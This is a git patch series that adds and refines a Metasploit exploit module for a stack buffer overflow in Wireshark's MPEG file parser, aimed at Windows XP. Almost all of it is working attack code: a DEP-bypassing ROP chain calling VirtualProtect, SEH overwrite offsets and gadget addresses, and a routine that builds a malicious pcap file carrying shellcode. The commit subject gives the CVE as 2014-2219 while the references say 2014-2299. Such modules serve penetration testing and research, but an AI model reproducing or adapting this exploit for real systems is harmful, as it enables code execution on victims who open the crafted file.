From da26a3963461aa9bf11f60ce10502299fe215680 Mon Sep 17 00:00:00 2001 From: JoseMi Date: Mon, 14 Apr 2014 16:16:10 +0100 Subject: [PATCH 01/11] Add CVE-2014-2219 exploit for windows XP SP3 --- .../windows/misc/wireshark_mpeg_overflow.rb | 118 ++++++++++++++++++ 1 file changed, 118 insertions(+) create mode 100644 modules/exploits/windows/misc/wireshark_mpeg_overflow.rb diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb new file mode 100644 index 0000000000..f26a6dd311 --- /dev/null +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -0,0 +1,118 @@ +# +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow (remote) PoC', + 'Description' => %q{ + This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 + by sending an malicious packet.) + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'j0sm1', # Exploit and msf module + ], + 'References' => + [ + [ 'CVE', '2014-2299'], + [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ], + [ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ], + [ 'URL', 'http://www.securityfocus.com/bid/66066/info' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'BadChars' => "\xff\x00", + 'Space' => 600, + 'DisableNops' => 'True', + 'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200 + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'WinXP SP3 Spanish (bypass DEP)', + { + 'OffSet' => 70692, + 'Ret' => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module + 'jmpesp' => 0x68e2bfb9, + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Mar 20 2014', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'pcap file', 'mpeg_overflow.pcap']), + ], self.class) + end + + def junk + return rand_text(4).unpack("L")[0].to_i + end + def create_rop_chain() + + # rop chain generated with mona.py - www.corelan.be + rop_gadgets = + [ + 0x78b41ccb, # POP EAX # RETN [MSVCR100.dll] + 0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll] + 0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll] + 0x68605980, # XCHG EAX,ESI # RETN [libglib-2.0-0.dll] + 0x64f94ba1, # POP EBP # RETN [libfontconfig-1.dll] + 0x63cd04f1, # & push esp # ret [liblzma-5.dll] + 0x6d4c331b, # POP EBX # RETN [libpangocairo-1.0-0.dll] + 0x00000201, # 0x00000201-> ebx + 0x78aa3bfb, # POP EDX # RETN [MSVCR100.dll] + 0x00000040, # 0x00000040-> edx + 0x78b29eda, # POP ECX # RETN [MSVCR100.dll] + 0x668242b9, # &Writable location [libgnutls-26.dll] + 0x70f67579, # POP EDI # RETN [libxml2-2.dll] + 0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll] + 0x6d5f8297, # POP EAX # RETN [libgio-2.0-0.dll] + 0x90909090, # nop + 0x6536979d, # PUSHAD # RETN [libpixman-1-0.dll] + ].flatten.pack("V*") + + return rop_gadgets + + end + + def exploit + + print_status("Creating '#{datastore['FILENAME']}' file ...") + magic_header = "\xff\xfb" # mpeg magic_number + packet = pattern_create(892) + ropchain = create_rop_chain + packet << ropchain + packet << payload.encoded # Shellcode + packet << pattern_create(target['OffSet'] - 892 - ropchain.length - payload.encoded.length) + # SEH pointers overwrite (nseh & seh) + packet << "\x90\x90\x90\x90" # nseh + # 0xff is badchar then we can't make a jump back with jmp $-2000 + # After nseh and seh we haven't space, then we have to jump to another location. + # 0x6b805955 : # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** | {PAGE_EXECUTE_REA + packet << "\x55\x59\x80\x6b" # seh -> ADD ESP,offset # RETN + print_status("Preparing payload") + filecontent = magic_header + filecontent << packet + print_status("Writing payload to file, " + filecontent.length.to_s()+" bytes") + file_create(filecontent) + + end +end From e811e169dcf0bdb87900bfd2c0962f065b9a097a Mon Sep 17 00:00:00 2001 From: JoseMi Date: Mon, 14 Apr 2014 16:31:54 +0100 Subject: [PATCH 02/11] Cambios en el exploit --- modules/exploits/windows/misc/wireshark_mpeg_overflow.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index f26a6dd311..6ae406ef0c 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -16,11 +16,12 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow (remote) PoC', 'Description' => %q{ This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 - by sending an malicious packet.) + by generating an malicious file.) }, 'License' => MSF_LICENSE, 'Author' => [ + 'Wesley Neelen', # Discovery vulnerability 'j0sm1', # Exploit and msf module ], 'References' => From feea4c1fa67864a0c5c6fbcdf3cc2ca05a5fb8d3 Mon Sep 17 00:00:00 2001 From: JoseMi Date: Fri, 18 Apr 2014 19:05:53 +0100 Subject: [PATCH 03/11] ROP chain changed --- .../windows/misc/wireshark_mpeg_overflow.rb | 33 ++++++++++--------- 1 file changed, 17 insertions(+), 16 deletions(-) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index 6ae406ef0c..89b19f7b5a 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow (remote) PoC', + 'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow', 'Description' => %q{ This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 by generating an malicious file.) @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'WinXP SP3 Spanish (bypass DEP)', { 'OffSet' => 70692, - 'Ret' => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module + 'Ret' => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16) 'jmpesp' => 0x68e2bfb9, } ], @@ -66,28 +66,29 @@ class Metasploit3 < Msf::Exploit::Remote def junk return rand_text(4).unpack("L")[0].to_i end + def create_rop_chain() # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ - 0x78b41ccb, # POP EAX # RETN [MSVCR100.dll] + 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll] - 0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll] - 0x68605980, # XCHG EAX,ESI # RETN [libglib-2.0-0.dll] - 0x64f94ba1, # POP EBP # RETN [libfontconfig-1.dll] - 0x63cd04f1, # & push esp # ret [liblzma-5.dll] - 0x6d4c331b, # POP EBX # RETN [libpangocairo-1.0-0.dll] + 0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] + 0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] + 0x619c0a2a, # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] + 0x61841e98, # & push esp # ret [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] + 0x6191d11a, # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x00000201, # 0x00000201-> ebx - 0x78aa3bfb, # POP EDX # RETN [MSVCR100.dll] + 0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0] 0x00000040, # 0x00000040-> edx - 0x78b29eda, # POP ECX # RETN [MSVCR100.dll] + 0x6197660f, # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x668242b9, # &Writable location [libgnutls-26.dll] - 0x70f67579, # POP EDI # RETN [libxml2-2.dll] + 0x6199b8a5, # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0 0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll] - 0x6d5f8297, # POP EAX # RETN [libgio-2.0-0.dll] + 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] 0x90909090, # nop - 0x6536979d, # PUSHAD # RETN [libpixman-1-0.dll] + 0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0] ].flatten.pack("V*") return rop_gadgets @@ -98,14 +99,14 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Creating '#{datastore['FILENAME']}' file ...") magic_header = "\xff\xfb" # mpeg magic_number - packet = pattern_create(892) + packet = pattern_create(892) ropchain = create_rop_chain packet << ropchain packet << payload.encoded # Shellcode packet << pattern_create(target['OffSet'] - 892 - ropchain.length - payload.encoded.length) # SEH pointers overwrite (nseh & seh) - packet << "\x90\x90\x90\x90" # nseh - # 0xff is badchar then we can't make a jump back with jmp $-2000 + packet << make_nops(4) # nseh + # \0xff is a badchar then we can't make a jump back with jmp $-2000 # After nseh and seh we haven't space, then we have to jump to another location. # 0x6b805955 : # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** | {PAGE_EXECUTE_REA packet << "\x55\x59\x80\x6b" # seh -> ADD ESP,offset # RETN From 7bc546e69a8e86b81ea91a450f6a72ff8ee3506b Mon Sep 17 00:00:00 2001 From: JoseMi Date: Sat, 19 Apr 2014 17:45:28 +0100 Subject: [PATCH 04/11] Add rand_text_alpha function --- .../exploits/windows/misc/wireshark_mpeg_overflow.rb | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index 89b19f7b5a..3034a0c0f1 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Payload' => { - 'BadChars' => "\xff\x00", + 'BadChars' => "\xff", 'Space' => 600, 'DisableNops' => 'True', 'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200 @@ -63,10 +63,6 @@ class Metasploit3 < Msf::Exploit::Remote ], self.class) end - def junk - return rand_text(4).unpack("L")[0].to_i - end - def create_rop_chain() # rop chain generated with mona.py - www.corelan.be @@ -98,8 +94,8 @@ class Metasploit3 < Msf::Exploit::Remote def exploit print_status("Creating '#{datastore['FILENAME']}' file ...") - magic_header = "\xff\xfb" # mpeg magic_number - packet = pattern_create(892) + magic_header = "\xff\xfb\x41" # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure + packet = rand_text_alpha(891) ropchain = create_rop_chain packet << ropchain packet << payload.encoded # Shellcode From 3861541204e6bd23bb92b5e5d64179ca3e36355a Mon Sep 17 00:00:00 2001 From: JoseMi Date: Sat, 19 Apr 2014 18:37:58 +0100 Subject: [PATCH 05/11] Add more rand_text_alpha functions --- modules/exploits/windows/misc/wireshark_mpeg_overflow.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index 3034a0c0f1..3002bfe3e7 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote ropchain = create_rop_chain packet << ropchain packet << payload.encoded # Shellcode - packet << pattern_create(target['OffSet'] - 892 - ropchain.length - payload.encoded.length) + packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length) # SEH pointers overwrite (nseh & seh) packet << make_nops(4) # nseh # \0xff is a badchar then we can't make a jump back with jmp $-2000 From e25ca6464161b735f2dc699ded9f6dcad4ef3464 Mon Sep 17 00:00:00 2001 From: JoseMi Date: Mon, 21 Apr 2014 17:49:40 +0100 Subject: [PATCH 06/11] It's solved the crash when double-click on the pcap file --- .../windows/misc/wireshark_mpeg_overflow.rb | 31 +++++++++++++------ 1 file changed, 22 insertions(+), 9 deletions(-) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index 3002bfe3e7..934449dbb8 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -47,7 +47,8 @@ class Metasploit3 < Msf::Exploit::Remote [ [ 'WinXP SP3 Spanish (bypass DEP)', { - 'OffSet' => 70692, + 'OffSet' => 69732, + 'OffSet2' => 70476, 'Ret' => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16) 'jmpesp' => 0x68e2bfb9, } @@ -94,18 +95,30 @@ class Metasploit3 < Msf::Exploit::Remote def exploit print_status("Creating '#{datastore['FILENAME']}' file ...") - magic_header = "\xff\xfb\x41" # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure - packet = rand_text_alpha(891) + ropchain = create_rop_chain + magic_header = "\xff\xfb\x41" # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure + # Here we build the packet data + packet = rand_text_alpha(883) + packet << "\x6c\x7d\x37\x6c" # NOP RETN + packet << "\x6c\x7d\x37\x6c" # NOP RETN packet << ropchain - packet << payload.encoded # Shellcode + packet << payload.encoded # Shellcode packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length) - # SEH pointers overwrite (nseh & seh) - packet << make_nops(4) # nseh - # \0xff is a badchar then we can't make a jump back with jmp $-2000 + + # 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000 # After nseh and seh we haven't space, then we have to jump to another location. - # 0x6b805955 : # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** | {PAGE_EXECUTE_REA - packet << "\x55\x59\x80\x6b" # seh -> ADD ESP,offset # RETN + + # When file is open with command line. This is NSEH/SEH overwrite + packet << make_nops(4) # nseh + packet << "\x6c\x2e\xe0\x68" # ADD ESP,93C # MOV EAX,EBX # POP EBX # POP ESI # POP EDI # POP EBP # RETN + + packet << rand_text_alpha(target['OffSet2'] - target['OffSet'] - 8) # junk + + # When file is open with GUI interface. This is NSEH/SEH overwrite + packet << make_nops(4) # nseh + packet << "\x55\x59\x80\x6b" # seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** + print_status("Preparing payload") filecontent = magic_header filecontent << packet From fd95d9ef382cdd53940ab7696047881f53b9ac70 Mon Sep 17 00:00:00 2001 From: JoseMi Date: Wed, 23 Apr 2014 17:32:56 +0100 Subject: [PATCH 07/11] Added english windows xp sp2 target --- .../exploits/windows/misc/wireshark_mpeg_overflow.rb | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index 934449dbb8..16f1f81771 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -53,10 +53,18 @@ class Metasploit3 < Msf::Exploit::Remote 'jmpesp' => 0x68e2bfb9, } ], + [ 'WinXP SP2 English (bypass DEP)', + { + 'OffSet2' => 70692, + 'OffSet' => 70476, + 'Ret' => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module + 'jmpesp' => 0x68e2bfb9, + } + ], ], 'Privileged' => false, 'DisclosureDate' => 'Mar 20 2014', - 'DefaultTarget' => 0)) + 'DefaultTarget' => 1)) register_options( [ From 2e76db01d7a3923a51ff73047d7c07e4a9da1da2 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 24 Apr 2014 13:15:12 -0500 Subject: [PATCH 08/11] Try to stick to the 100 columns per line rule --- modules/exploits/windows/misc/wireshark_mpeg_overflow.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index 16f1f81771..4678451385 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote packet << "\x6c\x7d\x37\x6c" # NOP RETN packet << "\x6c\x7d\x37\x6c" # NOP RETN packet << ropchain - packet << payload.encoded # Shellcode + packet << payload.encoded # Shellcode packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length) # 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000 @@ -125,7 +125,8 @@ class Metasploit3 < Msf::Exploit::Remote # When file is open with GUI interface. This is NSEH/SEH overwrite packet << make_nops(4) # nseh - packet << "\x55\x59\x80\x6b" # seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** + # seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** + packet << "\x55\x59\x80\x6b" print_status("Preparing payload") filecontent = magic_header From ba8d7801f4758eceff0d8950814921cf2060bdb3 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 24 Apr 2014 13:15:49 -0500 Subject: [PATCH 09/11] Remove default target because there is no auto-select --- modules/exploits/windows/misc/wireshark_mpeg_overflow.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index 4678451385..21664b9d7b 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -63,8 +63,8 @@ class Metasploit3 < Msf::Exploit::Remote ], ], 'Privileged' => false, - 'DisclosureDate' => 'Mar 20 2014', - 'DefaultTarget' => 1)) + 'DisclosureDate' => 'Mar 20 2014' + )) register_options( [ From a39855e20d9265e3292c5e930b8d5c01fb184ac8 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 24 Apr 2014 13:16:24 -0500 Subject: [PATCH 10/11] Works for XP SP3 too --- modules/exploits/windows/misc/wireshark_mpeg_overflow.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index 21664b9d7b..dc4146c897 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote 'jmpesp' => 0x68e2bfb9, } ], - [ 'WinXP SP2 English (bypass DEP)', + [ 'WinXP SP2/SP3 English (bypass DEP)', { 'OffSet2' => 70692, 'OffSet' => 70476, From cde9080a6aa90b16ee57a8fd83923187d13249c3 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 24 Apr 2014 13:17:08 -0500 Subject: [PATCH 11/11] Move module to fileformat --- .../windows/{misc => fileformat}/wireshark_mpeg_overflow.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/windows/{misc => fileformat}/wireshark_mpeg_overflow.rb (100%) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb similarity index 100% rename from modules/exploits/windows/misc/wireshark_mpeg_overflow.rb rename to modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb